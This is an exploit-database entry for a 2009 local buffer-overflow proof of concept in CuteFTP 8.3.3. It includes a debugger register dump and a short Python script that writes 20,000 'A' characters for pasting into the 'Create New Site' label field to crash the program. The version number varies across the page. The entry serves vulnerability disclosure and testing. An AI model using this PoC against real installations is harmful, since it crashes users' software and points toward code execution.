header-logo
Suggest Exploit
vendor:
CuteFTP
by:
Dr_IDE
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: CuteFTP
Affected Version From: 8.3.2003
Affected Version To: 8.3.2003
Patch Exists: YES
Related CWE: N/A
CPE: a:globalscape:cuteftp:8.3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 RC, XP
2009

CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC

This PoC exploits the 'Create New Site' mechanism. Any site type that you pick will work. Because of differences in the internal process of each site type you may be able to get execution through one of these channels.

Mitigation:

Ensure that all user input is validated and sanitized before being used in any application.
Source

Exploit-DB raw data:

#!/usr/bin/env python

#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Download: 	http://www.cuteftp.com/downloads/
# Tested On:	Windows 7 RC, XP might be more shell friendly
# Notes: 	This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# 		Because of differences in the internal process of each site type you may be able to get
#		execution through one of these channels.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""

buff = ("\x41" * 20000)

try:
	f1 = open("CuteFTP.txt","w");
	f1.write(buff);
	f1.close();

	print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "\nFile Created Successfully.\n"
	print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
	print "[-] Error. File couldn't be created."

Navigation

Suggest Exploit

Services By CQR